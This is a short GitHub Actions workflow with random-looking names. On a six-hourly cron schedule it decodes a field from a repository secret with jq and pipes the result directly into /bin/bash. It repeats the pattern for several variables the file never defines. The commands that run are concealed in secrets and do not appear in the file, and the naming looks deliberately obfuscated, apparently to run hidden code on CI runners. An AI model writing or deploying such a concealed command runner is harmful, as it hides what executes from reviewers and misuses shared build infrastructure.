name: liaogaitx

on:
  workflow_dispatch:
  schedule:
    - cron: '51 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liaogaitx
        env:
          wwxlo681: ${{ secrets.wwxlo681 }}
        run: |
          echo $wwxlo681 | jq -r .ix817 | /bin/bash
          echo $osjv09904 | jq -r .pj04 | /bin/bash
          echo $rh9 | jq -r .spd012 | /bin/bash
          echo $wml77623 | jq -r .cra450 | /bin/bash
          echo $e54109 | jq -r .hdt6546 | /bin/bash
          echo $bnvbf2774 | jq -r .g7933 | /bin/bash
          echo $qc21979 | jq -r .wgwyp59545 | /bin/bash
          echo $bdh5696 | jq -r .dxi29725 | /bin/bash
          echo $xtz46503 | jq -r .znusv69 | /bin/bash

